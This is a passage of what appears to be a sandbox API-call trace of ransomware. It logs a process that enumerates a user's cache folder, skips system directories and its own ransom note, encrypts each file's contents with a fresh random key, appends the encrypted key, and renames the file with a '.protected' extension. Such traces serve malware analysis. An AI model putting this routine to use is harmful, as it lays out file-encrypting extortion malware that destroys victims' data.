halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.552] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F") returned 151 [0088.552] StrStrW (lpFirst="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpSrch=".txt") returned 0x0 [0088.552] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F") returned 151 [0088.552] StrStrW (lpFirst="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpSrch=".rar") returned 0x0 [0088.552] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F") returned 151 [0088.552] StrStrW (lpFirst="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", lpSrch=".zip") returned 0x0 [0088.552] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x6e3, lpOverlapped=0x0) returned 1 [0088.553] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff91d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.553] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x6e3, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x6e3, lpOverlapped=0x0) returned 1 [0088.553] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.553] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.553] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.553] CloseHandle (hObject=0x150) returned 1 [0088.553] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F.protected") returned 161 [0088.553] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_3df94eb797096674f7793a562a778c5f.protected")) returned 1 [0088.554] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.554] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpString2="Windows") returned -1 [0088.554] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpString2="Program Files") returned -1 [0088.554] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpString2="Program Files (x86)") returned -1 [0088.554] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpString2="$Recycle.bin") returned 1 [0088.554] lstrcmpiW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpString2="System Volume Information") returned -1 [0088.554] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416") returned 151 [0088.554] StrStrIW (lpFirst="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpSrch=".protected") returned 0x0 [0088.554] lstrcmpW (lpString1="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpString2="RESTORE_FILES.txt") returned -1 [0088.554] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.554] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.554] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.558] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416") returned 151 [0088.558] StrStrW (lpFirst="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpSrch=".txt") returned 0x0 [0088.558] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416") returned 151 [0088.558] StrStrW (lpFirst="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpSrch=".rar") returned 0x0 [0088.558] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416") returned 151 [0088.558] StrStrW (lpFirst="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", lpSrch=".zip") returned 0x0 [0088.558] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x6e3, lpOverlapped=0x0) returned 1 [0088.562] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff91d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.562] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x6e3, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x6e3, lpOverlapped=0x0) returned 1 [0088.562] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.562] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.562] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.562] CloseHandle (hObject=0x150) returned 1 [0088.562] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416.protected") returned 161 [0088.562] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8828f39c7c0ce9a14b25c7eb321181ba_c6ef73e4482b2588b1252d1a64b99416.protected")) returned 1 [0088.563] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.563] lstrcmpiW (lpString1="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpString2="Windows") returned -1 [0088.563] lstrcmpiW (lpString1="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpString2="Program Files") returned -1 [0088.563] lstrcmpiW (lpString1="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpString2="Program Files (x86)") returned -1 [0088.563] lstrcmpiW (lpString1="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpString2="$Recycle.bin") returned 1 [0088.563] lstrcmpiW (lpString1="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpString2="System Volume Information") returned -1 [0088.563] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned 151 [0088.563] StrStrIW (lpFirst="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpSrch=".protected") returned 0x0 [0088.563] lstrcmpW (lpString1="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpString2="RESTORE_FILES.txt") returned -1 [0088.563] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.563] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.563] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.564] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned 151 [0088.564] StrStrW (lpFirst="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpSrch=".txt") returned 0x0 [0088.564] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned 151 [0088.564] StrStrW (lpFirst="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpSrch=".rar") returned 0x0 [0088.564] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned 151 [0088.564] StrStrW (lpFirst="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", lpSrch=".zip") returned 0x0 [0088.564] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x59d, lpOverlapped=0x0) returned 1 [0088.587] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffa63, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.587] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x59d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x59d, lpOverlapped=0x0) returned 1 [0088.587] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.587] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.587] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.588] CloseHandle (hObject=0x150) returned 1 [0088.588] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61.protected") returned 161 [0088.588] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8e4e510f44a56b8c8ecfec352907c373_411140098d71f028134e9b8a21255c61.protected")) returned 1 [0088.589] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.589] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="Windows") returned -1 [0088.589] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="Program Files") returned -1 [0088.589] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="Program Files (x86)") returned -1 [0088.589] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="$Recycle.bin") returned 1 [0088.589] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="System Volume Information") returned -1 [0088.589] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015") returned 118 [0088.589] StrStrIW (lpFirst="94308059B57B3142E455B38A6EB92015", lpSrch=".protected") returned 0x0 [0088.589] lstrcmpW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="RESTORE_FILES.txt") returned -1 [0088.589] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.589] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.590] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\94308059b57b3142e455b38a6eb92015"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.590] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015") returned 118 [0088.590] StrStrW (lpFirst="94308059B57B3142E455B38A6EB92015", lpSrch=".txt") returned 0x0 [0088.590] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015") returned 118 [0088.590] StrStrW (lpFirst="94308059B57B3142E455B38A6EB92015", lpSrch=".rar") returned 0x0 [0088.590] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015") returned 118 [0088.590] StrStrW (lpFirst="94308059B57B3142E455B38A6EB92015", lpSrch=".zip") returned 0x0 [0088.590] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0088.593] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.593] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0088.594] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.594] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.595] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.595] CloseHandle (hObject=0x150) returned 1 [0088.595] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015.protected") returned 128 [0088.595] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\94308059b57b3142e455b38a6eb92015"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\94308059b57b3142e455b38a6eb92015.protected")) returned 1 [0088.596] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.596] lstrcmpiW (lpString1="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpString2="Windows") returned -1 [0088.596] lstrcmpiW (lpString1="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpString2="Program Files") returned -1 [0088.596] lstrcmpiW (lpString1="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpString2="Program Files (x86)") returned -1 [0088.596] lstrcmpiW (lpString1="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpString2="$Recycle.bin") returned 1 [0088.596] lstrcmpiW (lpString1="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpString2="System Volume Information") returned -1 [0088.596] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned 151 [0088.596] StrStrIW (lpFirst="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpSrch=".protected") returned 0x0 [0088.596] lstrcmpW (lpString1="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpString2="RESTORE_FILES.txt") returned -1 [0088.596] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.596] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.596] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.597] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned 151 [0088.597] StrStrW (lpFirst="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpSrch=".txt") returned 0x0 [0088.597] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned 151 [0088.597] StrStrW (lpFirst="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpSrch=".rar") returned 0x0 [0088.597] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned 151 [0088.597] StrStrW (lpFirst="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpSrch=".zip") returned 0x0 [0088.598] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x5e0, lpOverlapped=0x0) returned 1 [0088.605] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffa20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.605] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x5e0, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x5e0, lpOverlapped=0x0) returned 1 [0088.605] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.605] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.605] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, 